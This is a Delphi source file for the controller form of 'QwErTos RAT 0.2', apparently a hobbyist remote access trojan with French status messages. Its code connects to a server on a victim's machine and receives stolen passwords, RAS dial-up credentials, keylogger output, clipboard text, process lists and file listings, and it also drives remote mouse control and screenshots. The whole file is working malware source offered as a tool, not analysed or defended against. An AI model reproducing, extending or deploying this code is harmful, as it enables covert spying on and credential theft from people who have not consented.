(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untMain.pas                                     ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of Main form                        ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untMain;

interface

uses
  Windows, Messages, ImgList, Controls, Dialogs, ScktComp, ComCtrls, StdCtrls,
  ToolWin, Classes, ExtCtrls, SysUtils, Forms, Buttons;

type
  TfrmMain = class(TForm)
    ClientMain: TClientSocket;
    PntStatus: TPanel;
    SaveDlg: TSaveDialog;
    ClientLogger: TClientSocket;
    ImgsTool: TImageList;
    PntTool: TPanel;
    ToolMain: TToolBar;
    ToolConnect: TToolButton;
    ToolDisconnect: TToolButton;
    ToolPing: TToolButton;
    ToolSep1: TToolButton;
    ToolSettings: TToolButton;
    ToolSep2: TToolButton;
    ToolClose: TToolButton;
    EdtPort: TEdit;
    LblDesc1: TLabel;
    EdtIP: TEdit;
    LblDesc: TLabel;
    LvwMenu: TListView;
    ImgsMenu: TImageList;
    ToolSep3: TToolButton;
    PagFeatures: TPageControl;
    tabMain: TTabSheet;
    tabTransfer: TTabSheet;
    PntMain: TPanel;
    ImgsPage: TImageList;
    PntTransfer: TPanel;
    LblUD: TLabel;
    EdtTransfer: TEdit;
    procedure ClientMainConnecting(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ClientMainConnect(Sender: TObject; Socket: TCustomWinSocket);
    procedure ClientMainDisconnect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ClientMainRead(Sender: TObject; Socket: TCustomWinSocket);
    procedure ToolConnectClick(Sender: TObject);
    procedure ToolDisconnectClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure VerifyData(Data: string);
    procedure ClientMainError(Sender: TObject; Socket: TCustomWinSocket;
      ErrorEvent: TErrorEvent; var ErrorCode: Integer);
    procedure ShowDrives(Data:string);
    procedure ConnectLogger(Data:string);
    procedure ClientLoggerRead(Sender: TObject; Socket: TCustomWinSocket);
    procedure ToolAboutClick(Sender: TObject);
    procedure ToolSettingsClick(Sender: TObject);
    procedure LvwMenuClick(Sender: TObject);
    procedure DockForm(Frm:TForm);
    procedure ToolPingClick(Sender: TObject);
    procedure ClientLoggerConnect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ClientLoggerError(Sender: TObject; Socket: TCustomWinSocket;
      ErrorEvent: TErrorEvent; var ErrorCode: Integer);
    procedure LoadAllSettings;
    procedure SaveAllSettings;
    procedure FormClose(Sender: TObject; var Action: TCloseAction);
    procedure ToolCloseClick(Sender: TObject);
    procedure LvwMenuKeyUp(Sender: TObject; var Key: Word;
      Shift: TShiftState);
    procedure ToolURLClick(Sender: TObject);
    procedure ClearForms;
  private
    OldFrm,cFrm:TForm;
    cTime:LongInt;
  public
    boolMov:Boolean;
    strNick,strStatus:string;
    lngKeyPort:longint;
    strDownFolder:string;
    procedure SendCommand(COMMAND: Integer; Args: string);
    procedure Connect(strIP: string; lngPort: longint);
    procedure PutStatus(strStatus: string);
    procedure SaveLines(Sender: TObject);
    procedure CloseSocket(ClientSocket:TClientSocket);
  end;

var
  frmMain: TfrmMain;

implementation

{$R *.DFM}

uses untCommands, untAbout, untChat,
     untSettings, untInformation, untResolutions,
     untClipboard, untDateTime, untLogger, untTaskList,
     untMouse, untFileManager, untServer, untFun, untBoot,
     untMsgBox, untOpenChat, untPrinter,untExtraFun,
     untGetSetSettings, untPasswords, untColors, untPrintScreen,
     untTransfer, untRAS, untFind, untCPU;

function ShellExecute(hWnd: HWND; Operation, FileName, Parameters, Directory: PChar;
         ShowCmd: Integer): HINST; stdcall; external 'shell32.dll' name 'ShellExecuteA';

procedure TfrmMain.SendCommand(COMMAND: Integer; Args: string);
begin
   if ClientMain.Active then
      try
         ClientMain.Socket.SendText(FormatFloat('00#',COMMAND) + Args);
         PutStatus(strStatus);
      except
      end
   else
      PutStatus('pas connect...');
end;

procedure TfrmMain.Connect(strIP: string; lngPort: longint);
begin
   CloseSocket(ClientMain);
   ClientMain.Address:=strIP;
   ClientMain.Port:=lngPort;
   try
      ClientMain.Open;
   except
      PutStatus('Impossible de connecter a ' + ClientMain.Address + '...');
   end;
end;

procedure TfrmMain.PutStatus(strStatus: string);
begin
   PntStatus.Caption:=strStatus;
   PntStatus.Hint:=strStatus;
end;

procedure TfrmMain.ClientMainConnecting(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   PutStatus('Connection a ' + ClientMain.Address + '...');
end;

procedure TfrmMain.ClientMainConnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   PutStatus('Connect a ' + ClientMain.Address + ' - ' + LowerCase(FormatDateTime('dddddd',Now)));
end;

procedure TfrmMain.ClientMainDisconnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   ToolDisconnectClick(nil);
   boolMov:=False;
   ClearForms;
   PutStatus('Dconnect de ' + ClientMain.Address + '...');
end;

procedure TfrmMain.ClientMainRead(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   VerifyData(Socket.ReceiveText);
end;

procedure TfrmMain.ToolConnectClick(Sender: TObject);
var
   cPort:Longint;
begin
   cPort:=StrToIntDef(Trim(EdtPort.Text),-1);
   if (cPort <= 0) or (cPort > 65535) then
   begin
      PutStatus('port invalide (1 a 65535)...');
      Exit;
   end;
   ToolDisconnectClick(Self);
   Connect(Trim(EdtIP.Text),cPort);
end;

procedure TfrmMain.ToolDisconnectClick(Sender: TObject);
begin
   CloseSocket(ClientLogger);
   CloseSocket(ClientMain);
end;

procedure TfrmMain.FormCreate(Sender: TObject);
begin
   Caption:='QwErTos RAT 0.2 (Latinus RIP)';
   Application.Title:='QwErTos RAT';
   PutStatus('Pret  connect...');
   LvwMenu.Columns.Items[0].Width:=(LvwMenu.Width - 6) - GetSystemMetrics(SM_CXVSCROLL);
   LoadAllSettings;
end;

{$WARNINGS OFF}

procedure TfrmMain.VerifyData(Data: string);
var
   COMMAND:integer;
begin
   COMMAND:=StrToIntDef(Copy(Data,1,3),-1);
   if COMMAND < 0 then Exit;
   Data:=Copy(Data,4,Length(Data));
   if COMMAND = COMMAND_PING_SERVER then
   begin
      PutStatus('Rponse PING en ' + FloatToStr((GetTickCount - cTime) / 1000) + ' secondes...');
      Exit;
   end
   else if COMMAND = COMMAND_GETINFO then
   begin
      frmInformation.RichInfo.Text:=Data;
      PutStatus('Information recue...');
   end
   else if COMMAND = COMMAND_ANSWER then
      PutStatus(Data)
   else if COMMAND = COMMAND_CLIP_READ then
   begin
      frmClipboard.MemClip.Text:=Data;
      PutStatus('Clipboard texte recu...');
   end
   else if COMMAND = COMMAND_READ_TIME_DATE then
   begin
      frmDateTime.ShowTime(Data);
      PutStatus('Heure et datte recu...');
   end
   else if COMMAND = COMMAND_GET_DBL_TIME then
   begin
      frmMouse.SpnSpeed.Text:=Data;
      PutStatus('Double-click vitesse recu...');
   end
   else if COMMAND = COMMAND_GET_TASK_LIST then
   begin
      frmTaskList.PutOnList(Data);
      PutStatus('Fenetres recues...');
   end
   else if COMMAND = COMMAND_SET_MOUSE_POS then
   begin
      if boolMov then
         SendCommand(COMMAND_SET_MOUSE_POS,frmMouse.DoPoint)
      else
         PutStatus('Mouvement arret...');
   end
   else if COMMAND = COMMAND_REFRESH_FOLDER then
   begin
      frmFileManager.ShowFiles(Data);
   end
   else if COMMAND = COMMAND_GET_DRIVES then
   begin
      ShowDrives(Data);
   end
   else if COMMAND = COMMAND_GET_SIZE then
   begin
      PutStatus(Data);
   end
   else if COMMAND = COMMAND_GET_SCREEN then
   begin
      frmScreen.ShowResolutions(Data);
   end
   else if COMMAND = COMMAND_CHAT_MESSAGE then
   begin
      if frmChat <> nil then
         frmChat.RichChat.Lines.Add(Data);
   end
   else if COMMAND = COMMAND_LOG_ENABLE then
   begin
      ConnectLogger(Data);
   end
   else if COMMAND = COMMAND_GET_PASSWORDS then
   begin
      frmPasswords.RichPasswords.Text:=Data;
      PutStatus('Passwords recus...');
   end
   else if COMMAND = COMMAND_GET_RAS_PWDS then
   begin
      frmPasswords.RichPasswords.Text:=Data;
      PutStatus('RAS passwords recus...');
   end
   else if COMMAND = COMMAND_RAS_ENTRIES then
   begin
      frmRAS.LstEntries.Items.Text:=Data;
      PutStatus('RAS recus...');
   end
   else if COMMAND = COMMAND_FIND_FILE then
   begin
      frmFind.LstFind.Items.Text:=Data;
      PutStatus(Format('%d fichiers trouvs...',[frmFind.LstFind.Items.Count]));
   end;
end;

procedure TfrmMain.ClientMainError(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
   if ErrorEvent = eeConnect then
      PutStatus('Impossible de connect  ' + ClientMain.Address + '...');
   ErrorCode:=0;
end;

procedure TfrmMain.ShowDrives(Data:string);
var
   p:integer;
   c,this:string;
   Items:TStrings;
begin
   c:=Chr(13);
   Items:=TStringList.Create;
   Items.Clear;
   p:=Pos(c,Data);
   while p > 0 do
   begin
      this:=Copy(Data,1,p-1);
      Data:=Copy(Data,p+1,Length(Data));
      p:=Pos(c,Data);
      Items.Add(this);
   end;
   Items.Add(Data);
   frmFileManager.CboDrives.Items.Clear;
   frmFileManager.CboDrives.Items:=Items;
   PutStatus('Partitions recues...');
end;

procedure TfrmMain.LvwMenuClick(Sender: TObject);
var
   LItem:TListItem;
begin
   LItem:=LvwMenu.Selected;
   if LItem = nil then Exit;
   case LItem.Index of
      0: cFrm:=frmServer;
      1: cFrm:=frmInformation;
      2: cFrm:=frmFun;
      3: cFrm:=frmBoot;
      4: cFrm:=frmClipboard;
      5: cFrm:=frmDateTime;
      6: cFrm:=frmMouse;
      7: cFrm:=frmMsgBox;
      8: cFrm:=frmTaskList;
      9: cFrm:=frmExtraFun;
      10: cFrm:=frmFileManager;
      11: cFrm:=frmScreen;
      12: cFrm:=frmOpenChat;
      13: cFrm:=frmLogger;
      14: cFrm:=frmPrinter;
      15: cFrm:=frmPasswords;
      16: cFrm:=frmColors;
      17: cFrm:=frmPrintScreen;
      18: cFrm:=frmRAS;
      19: cFrm:=frmFind;
      20: cFrm:=frmCPU;
   end;
   DockForm(cFrm);
   cFrm.Visible:=True;
   cFrm.Show;
   if PagFeatures.ActivePage <> tabMain then
      PagFeatures.ActivePage:=tabMain;
end;

procedure TfrmMain.DockForm(Frm:TForm);
begin
   if cFrm = OldFrm then Exit;
   if OldFrm <> nil then OldFrm.Visible:=False;
   Frm.ManualDock(PntMain,Self,alNone);
   Frm.Left:=(PntMain.ClientWidth - Frm.Width + 6) div 2;
   Frm.Top:=(PntMain.ClientHeight - Frm.Height + 12) div 2;
   OldFrm:=Frm;
end;

procedure TfrmMain.SaveLines(Sender: TObject);
var
   fName:string;
   L:Integer;
   f:TextFile;
begin
   if SaveDlg.Execute then
   begin
      fName:=SaveDlg.FileName;
      L:=Length(fName);
      if (SaveDlg.FilterIndex = 1) and (UpperCase(Copy(fName,L-3,L)) <> '.TXT') then
         fName:=fName + '.txt';
      AssignFile(f,fName);
      ReWrite(f);
      Writeln(f,(Sender as TRichEdit).Text);
      CloseFile(f);
   end;
end;

procedure TfrmMain.ConnectLogger(Data:string);
var
   cPort:longint;
begin
   cPort:=StrToIntDef(Data,-1);
   if cPort < 0 then
   begin
      PutStatus('Erreur lors du dmarrage du logger...');
      Exit;
   end;
   CloseSocket(ClientLogger);
   ClientLogger.Port:=cPort;
   ClientLogger.Address:=ClientMain.Address;
   try
      ClientLogger.Open;
   except
      CloseSocket(ClientLogger);
      PutStatus('Impossible de dmarrer le logger ...');
   end;
end;

procedure TfrmMain.CloseSocket(ClientSocket:TClientSocket);
begin
   ClientSocket.Active:=False;
end;

procedure TfrmMain.ClientLoggerRead(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   with frmLogger do
   begin
      RichLogger.Text:=RichLogger.Text + Socket.ReceiveText;
      if ChkAuto.Checked then
         SendMessage(RichLogger.Handle,WM_VSCROLL,SB_PAGEDOWN,0);
   end;
end;

procedure TfrmMain.ToolAboutClick(Sender: TObject);
begin
   if frmAbout = nil then
      frmAbout:=TfrmAbout.Create(Self);
   frmAbout.ShowModal;
end;

procedure TfrmMain.ToolSettingsClick(Sender: TObject);
begin
   if frmSettings = nil then
      frmSettings:=TfrmSettings.Create(Self);
   frmSettings.ShowModal;
end;

procedure TfrmMain.ToolPingClick(Sender: TObject);
begin
   cTime:=GetTickCount;
   strStatus:='Attente de rponse...';
   SendCommand(COMMAND_PING_SERVER,'');
end;

procedure TfrmMain.ClientLoggerConnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   PutStatus('logger dmarr...');
end;

procedure TfrmMain.ClientLoggerError(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
   if ErrorEvent = eeConnect then
      PutStatus('Impossible de dmarrer le logger...');
   ErrorCode:=0;
end;

procedure TfrmMain.LoadAllSettings;
var
   strPort:string;
begin
   GetDir(0,strDownFolder);
   GetSetting('LoggerPort',strPort);
   GetSetting('DownloadFolder',strDownFolder);
   lngKeyPort:=StrToIntDef(strPort,110);
end;

procedure TfrmMain.SaveAllSettings;
begin
   SaveSetting('LoggerPort',IntToStr(lngKeyPort));
   SaveSetting('DownloadFolder',strDownFolder);
end;

procedure TfrmMain.FormClose(Sender: TObject; var Action: TCloseAction);
begin
   SaveAllSettings;
   CloseSocket(ClientLogger);
   CloseSocket(ClientMain);
end;

procedure TfrmMain.ToolCloseClick(Sender: TObject);
begin
   Close;
end;

procedure TfrmMain.LvwMenuKeyUp(Sender: TObject; var Key: Word;
  Shift: TShiftState);
begin
   LvwMenuClick(LvwMenu);
end;

procedure TfrmMain.ToolURLClick(Sender: TObject);
begin
   ShellExecute(Handle,'open','http://www.qwerto.cjb.net',nil,nil,1);
end;

procedure TfrmMain.ClearForms;
begin
   frmTaskList.LvwProcess.Items.Clear;
   frmFileManager.LvwFiles.Items.Clear;
   frmFileManager.EdtHistoric.Clear;
   frmFileManager.CboDrives.Items.Clear;   
   frmScreen.LvwResolutions.Items.Clear;
   frmRAS.LstEntries.Items.Clear;
   frmFind.LstFind.Items.Clear;
end;

end.
